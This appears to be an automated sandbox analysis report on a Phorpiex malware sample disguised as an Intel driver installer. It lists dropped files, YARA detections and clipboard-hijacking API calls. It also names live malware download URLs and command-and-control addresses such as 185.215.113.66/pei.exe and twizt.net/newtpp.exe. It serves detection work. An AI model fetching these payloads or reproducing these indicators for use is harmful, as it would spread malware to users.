                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficDNS traffic detected: DNS query: twizt.net
                              Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drString found in binary or memory: http://185.215.113.66/
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/10Y
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/11
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/19YW
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1LMEM0xHm
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1r
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1s
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000770000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3ZY
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3~Y
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/FYL
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/der
                              Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189021748.000000000019A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exe
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exe(
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.000000000289D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exeQQC:
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exei
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pei.exep
                              Source: sysppvrdnvs.exeString found in binary or memory: http://185.215.113.66/tdrp.exe
                              Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drString found in binary or memory: http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
                              Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe, 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, 2658326577.exe.4.dr, sysppvrdnvs.exe.3.dr, newtpp[1].exe.2.dr, 71384504.exe.2.drString found in binary or memory: http://91.202.233.141/
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523875975.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2525738269.0000000005D8D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntbl
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntblZ
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntbll
                              Source: sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntbltwork
                              Source: thcdVit1dX.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
                              Source: thcdVit1dX.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                              Source: thcdVit1dX.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                              Source: thcdVit1dX.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                              Source: thcdVit1dX.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                              Source: thcdVit1dX.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: thcdVit1dX.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: thcdVit1dX.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                              Source: thcdVit1dX.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                              Source: thcdVit1dX.exeString found in binary or memory: http://ocsp.sectigo.com0
                              Source: thcdVit1dX.exeString found in binary or memory: http://ocsp.sectigo.com0#
                              Source: 71384504.exe.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: 71384504.exe.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                              Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
                              Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe:
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.drString found in binary or memory: http://twizt.net/newtpp.exeP0
                              Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exek
                              Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exes
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.drString found in binary or memory: http://twizt.net/peinstall.php
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288610802.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, 4BBF.exe, 00000002.00000000.2188723249.0000000000C92000.00000002.00000001.01000000.00000006.sdmp, pei[1].exe.0.dr, 4BBF.exe.0.drString found in binary or memory: http://twizt.net/peinstall.php%temp%%s
                              Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpQZ
                              Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpshqos.dll.mui
                              Source: 4BBF.exe, 00000002.00000002.2288265241.0000000000A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpystem32
                              Source: thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                              Source: thcdVit1dX.exeString found in binary or memory: https://sectigo.com/CPS0
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00404970
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00404970
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_004059B0
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_004059B0

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Yara detected Phorpiex
                              Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.71384504.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.0.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 26.2.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.2.71384504.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 71384504.exe PID: 7464, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 7488, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 8108, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 2658326577.exe PID: 1400, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2658326577.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\71384504.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040FB45 NtQueryVirtualMemory,3_2_0040FB45
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,3_2_0040DF20
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040FB45 NtQueryVirtualMemory,4_2_0040FB45
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,4_2_0040DF20
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040FB45 NtQueryVirtualMemory,17_2_0040FB45
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,17_2_0040DF20
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeCode function: 18_2_00007FF848930685 NtQuerySystemInformation,18_2_00007FF848930685
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeCode function: 18_2_00007FF848930690 NtQuerySystemInformation,18_2_00007FF848930690
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeCode function: 18_2_00007FF848930F11 NtQuerySystemInformation,18_2_00007FF848930F11
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeFile created: C:\Windows\sysppvrdnvs.exeJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0041302B0_2_0041302B
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004440C60_2_004440C6
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0043D0DA0_2_0043D0DA
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0045F10B0_2_0045F10B
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004641A80_2_004641A8
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004232680_2_00423268
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0043E2930_2_0043E293
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004153DD0_2_004153DD
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004204800_2_00420480
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004575EC0_2_004575EC
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004487490_2_00448749
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0040AC600_2_0040AC60
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0045EC600_2_0045EC60
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00410ED90_2_00410ED9
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004084D03_2_004084D0
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004084F93_2_004084F9
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004040903_2_00404090
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040AEB03_2_0040AEB0
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_004049703_2_00404970
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040F9083_2_0040F908
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004084D04_2_004084D0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004084F94_2_004084F9
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004040904_2_00404090
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040AEB04_2_0040AEB0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004049704_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040F9084_2_0040F908
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084D017_2_004084D0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084F917_2_004084F9
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040409017_2_00404090
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040AEB017_2_0040AEB0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040497017_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040F90817_2_0040F908
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2355412914.exe 5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: String function: 0040129E appears 871 times
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: String function: 0040BA47 appears 83 times
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: String function: 00452000 appears 33 times
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: String function: 004012A1 appears 1445 times
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: String function: 0046B18E appears 94 times
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: String function: 00403578 appears 64 times
                              Source: 2355412914.exe.4.drStatic PE information: No import functions for PE file found
                              Source: thcdVit1dX.exe, 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bOriginalFilenameIntel-Driver-and-Support-Assistant-Installer.exedDProductNameIntel vs thcdVit1dX.exe
                              Source: thcdVit1dX.exeBinary or memory string: bOriginalFilenameIntel-Driver-and-Support-Assistant-Installer.exedDProductNameIntel vs thcdVit1dX.exe
                              Source: thcdVit1dX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@41/21@1/10
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004035CE FormatMessageW,GetLastError,LocalFree,0_2_004035CE
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00466838 LookupPrivilegeValueW,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,0_2_00466838
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,3_2_00406F70
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_0046F128 CLSIDFromProgID,CoCreateInstance,0_2_0046F128
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00470DEA FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError,0_2_00470DEA
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004445B2 ChangeServiceConfigW,GetLastError,0_2_004445B2
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeMutant created: NULL
                              Source: C:\Windows\sysppvrdnvs.exeMutant created: \Sessions\1\BaseNamedObjects\mmn7nnm8na
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeFile created: C:\Users\user\AppData\Local\Temp\4BBF.tmpJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: cabinet.dll0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: msi.dll0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: version.dll0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: wininet.dll0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: comres.dll0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: 8xG0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: PxG0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: hxG0_2_00401121
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCommand line argument: cabinet.dll0_2_00401121
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeSystem information queried: HandleInformationJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
